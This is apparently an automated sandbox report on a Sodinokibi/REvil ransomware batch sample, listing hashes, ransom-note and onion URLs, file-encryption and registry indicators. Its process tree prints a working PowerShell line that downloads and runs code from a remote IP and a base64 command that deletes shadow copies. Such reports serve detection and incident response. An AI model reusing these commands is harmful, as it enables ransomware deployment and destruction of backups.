Analysis
-
max time kernel
137s -
max time network
66s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
13-08-2020 14:10
Static task
static1
Behavioral task
behavioral1
Sample
f273d69e572f51a031e40b8c83f3e58b.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
f273d69e572f51a031e40b8c83f3e58b.bat
Resource
win10
General
-
Target
f273d69e572f51a031e40b8c83f3e58b.bat
-
Size
222B
-
MD5
8609a1469584fe2c96aa61c898fd08e2
-
SHA1
184957747a301ae172a76046daf5480c525a55db
-
SHA256
add2d6d1bb4a21cb6e1b3266aea269d4e66dbd7999ef070b81760cc64d547bac
-
SHA512
2192354833c5c0c07ad79980769ef1090d7232717f9c73c13f16b4558593a9eb3028818dbc564433a41bfc3f092ea1a39cffccf0440a81dbc09ab8f5114162ec
Malware Config
Extracted
http://185.103.242.78/pastes/f273d69e572f51a031e40b8c83f3e58b
Extracted
C:\3333t-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/75209EA47D1D4065
http://decryptor.cc/75209EA47D1D4065
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1040 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\RegisterDisconnect.tiff => \??\c:\users\admin\pictures\RegisterDisconnect.tiff.3333t powershell.exe File opened for modification \??\c:\users\admin\pictures\RegisterDisconnect.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ApproveConvertFrom.crw => \??\c:\users\admin\pictures\ApproveConvertFrom.crw.3333t powershell.exe File renamed C:\Users\Admin\Pictures\DebugTest.tif => \??\c:\users\admin\pictures\DebugTest.tif.3333t powershell.exe File renamed C:\Users\Admin\Pictures\ExpandSearch.crw => \??\c:\users\admin\pictures\ExpandSearch.crw.3333t powershell.exe File renamed C:\Users\Admin\Pictures\ConvertFromFind.png => \??\c:\users\admin\pictures\ConvertFromFind.png.3333t powershell.exe File renamed C:\Users\Admin\Pictures\EditFind.crw => \??\c:\users\admin\pictures\EditFind.crw.3333t powershell.exe File renamed C:\Users\Admin\Pictures\ImportCompress.png => \??\c:\users\admin\pictures\ImportCompress.png.3333t powershell.exe File renamed C:\Users\Admin\Pictures\StopRegister.crw => \??\c:\users\admin\pictures\StopRegister.crw.3333t powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fts503.bmp" powershell.exe -
Drops file in Program Files directory 38 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\NewPublish.aiff powershell.exe File opened for modification \??\c:\program files\ResolveSkip.mht powershell.exe File opened for modification \??\c:\program files\UnlockInstall.midi powershell.exe File created \??\c:\program files\3333t-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearMerge.svgz powershell.exe File opened for modification \??\c:\program files\LockEnable.xla powershell.exe File opened for modification \??\c:\program files\LimitGroup.avi powershell.exe File opened for modification \??\c:\program files\LimitUnprotect.wm powershell.exe File opened for modification \??\c:\program files\MoveConvert.tiff powershell.exe File opened for modification \??\c:\program files\SyncComplete.wmx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3333t-readme.txt powershell.exe File opened for modification \??\c:\program files\AddConvertTo.potx powershell.exe File opened for modification \??\c:\program files\ExpandOut.3g2 powershell.exe File opened for modification \??\c:\program files\ImportExit.m3u powershell.exe File opened for modification \??\c:\program files\HideSend.wm powershell.exe File opened for modification \??\c:\program files\MergeDebug.clr powershell.exe File opened for modification \??\c:\program files\OpenConvertTo.xlsb powershell.exe File opened for modification \??\c:\program files\ResumeUnpublish.jpeg powershell.exe File opened for modification \??\c:\program files\ConvertResolve.emz powershell.exe File created \??\c:\program files\microsoft sql server compact edition\3333t-readme.txt powershell.exe File opened for modification \??\c:\program files\MountSave.wax powershell.exe File opened for modification \??\c:\program files\ReceiveClose.WTV powershell.exe File opened for modification \??\c:\program files\UnregisterRestore.mhtml powershell.exe File opened for modification \??\c:\program files\StepApprove.txt powershell.exe File opened for modification \??\c:\program files\ApproveSuspend.vsd powershell.exe File opened for modification \??\c:\program files\ConvertToSplit.i64 powershell.exe File opened for modification \??\c:\program files\SplitExport.edrwx powershell.exe File opened for modification \??\c:\program files\ReceiveEnter.wpl powershell.exe File opened for modification \??\c:\program files\SaveWatch.vbe powershell.exe File opened for modification \??\c:\program files\SetSync.search-ms powershell.exe File opened for modification \??\c:\program files\StepOut.xlsx powershell.exe File opened for modification \??\c:\program files\TestAssert.pptm powershell.exe File created \??\c:\program files (x86)\3333t-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointResize.xml powershell.exe File opened for modification \??\c:\program files\OpenMerge.contact powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\3333t-readme.txt powershell.exe File opened for modification \??\c:\program files\FormatCompress.ttf powershell.exe File opened for modification \??\c:\program files\PushBackup.php powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1040 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1040 powershell.exe 1040 powershell.exe 1040 powershell.exe 1352 powershell.exe 1352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeBackupPrivilege 1372 vssvc.exe Token: SeRestorePrivilege 1372 vssvc.exe Token: SeAuditPrivilege 1372 vssvc.exe Token: SeTakeOwnershipPrivilege 1040 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 748 wrote to memory of 1040 748 cmd.exe powershell.exe PID 748 wrote to memory of 1040 748 cmd.exe powershell.exe PID 748 wrote to memory of 1040 748 cmd.exe powershell.exe PID 748 wrote to memory of 1040 748 cmd.exe powershell.exe PID 1040 wrote to memory of 1352 1040 powershell.exe powershell.exe PID 1040 wrote to memory of 1352 1040 powershell.exe powershell.exe PID 1040 wrote to memory of 1352 1040 powershell.exe powershell.exe PID 1040 wrote to memory of 1352 1040 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\f273d69e572f51a031e40b8c83f3e58b.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f273d69e572f51a031e40b8c83f3e58b');Invoke-QEEAWDOACTLVWYR;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1372